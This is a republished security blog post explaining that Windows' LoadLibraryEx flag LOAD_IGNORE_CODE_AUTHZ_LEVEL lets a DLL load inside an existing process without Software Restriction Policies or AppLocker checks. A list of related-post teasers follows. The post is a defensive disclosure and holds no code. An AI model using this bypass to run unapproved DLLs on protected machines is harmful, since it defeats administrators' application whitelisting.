We’ve seen it countless times before. A vendor designs a security product, but punches a hole in this shield to accommodate developers. Yet, I still love the irony of it.
Software Restriction Policies and AppLocker can be configured to whitelist DLLs. But LoadLibraryEx has a feature (LOAD_IGNORE_CODE_AUTHZ_LEVEL) to circumvent SRP and AppLocker. From the MSDN documentation:
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies for the DLL. This action applies only to the DLL being loaded and not to its dependents. This value is recommended for use in setup programs that must run extracted DLLs during installation.
I’ve blogged about a spreadsheet that creates a DLL in a temporary location, and loads it inside the Excel process with LoadLibrary. It’s easy to block this DLL with SRP or AppLocker. But now I found out it’s also easy to bypass this, much easier than what I’ve done before. I just have to replace a call to LoadLibrary with a call to LoadLibraryEx, and pass it argument LOAD_IGNORE_CODE_AUTHZ_LEVEL. That’s all it takes to bypass SRP and AppLocker.
Let it be clear that this only makes it possible to load arbitrary DLLs inside existing processes, it does not allow you to create a new process that SRP/AppLocker wouldn’t allow.
If you use SPR/AppLocker, should you worry? It depends against what risk you use it.
When you use SRP/AppLocker to prevent common malware or other unwanted programs from infecting your machine, there’s no problem (now). If you use it on corporate computers to prevent your users from using software you don’t support, there’s no problem.
But if you use SRP/AppLocker as a security layer against (skilled) evil haxors, then you have to be aware that there is a large hole in your security layer and that it’s easy to misuse. In that case, you should better look out for another whitelisting security layer without “designer holes”. Unless it turns out Microsoft has a (hidden) setting to disable this feature, but I’ve not found one.
If this value is used, the system does not check AppLocker rules or apply Software Restriction Policies for the DLL. This action applies only to the DLL being loaded and not to its dependents. This value is recommended for use in setup programs that must run extracted DLLs during installation.
Full story: Didier Stevens
Related Posts
- Circumventing SRP and AppLocker to Create a New Process, By Design
There’s an interesting comment on my Circumventing SRP and AppLocker, By Design post.
In my previous post, I showed a feature to circumvent SRP and AppLocker validation when a DLL is loaded.
Th... - How to Design Security Warning Messages to Protect Users
Computer users are presented with a steady stream of security warnings, which are designed to help users avoid taking actions that put their systems and data at risk. Sometimes, a click on the OK butt... - Dissecting the design of a mobile malware – Swapi.B
Mobile malware is no longer a new trend. We have been observing quite a few cases of different mobile threats for a while now.
In this blog, we wanted to show how a typical mobile trojan is designed... - NWScript JIT engine: MSIL JIT backend overview and design goals
Yesterday, we examined the IR instruction raising process, at a high level. With a basic understanding of both how the IR is generated, and the IR design itself, we can begin to talk about the JIT ba... - Internet Security and VPN Network Design
Overview This article discusses some essential technical concepts associated with a VPN. A Virtual Private Network (VPN) integrates remote employees, company offices, and business partn... - Intel-McAfee Deal: Secure Mobility By Design
The news of Intel acquiring McAfee for nearly $8 billion caught the tech world off guard and perplexed analysts at face value. The fact is that it doesn't make much sense based on the Intel and McAfee... - Design that ensures security, also emphasizes style
Can security, often seen as obvious and ugly, actually be stylish and suitable for a building? Architect Rick Reeder gives us a tour of a property he designed with artful security as the goal
View ... - Mitigating the LNK 0-day with AppLocker
For a few days, the security ecosystem has been focusing on the Stuxnet malware and its innovative propagation method using a previously unknown vulnerability in the way Windows handles icons in LNK... - Mitigating the LNK 0-day wth AppLocker
For a few days, the security ecosystem has been focusing on the Stuxnet malware and its innovative propagation method using a previously unknown vulnerability in the way Windows handles icons in LNK... - Exploit Development Framework Design
Perl, Ruby Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: there should be one– and preferably...
Posted on 24 January 2011. Tags: AppLocker, Circumventing, Design
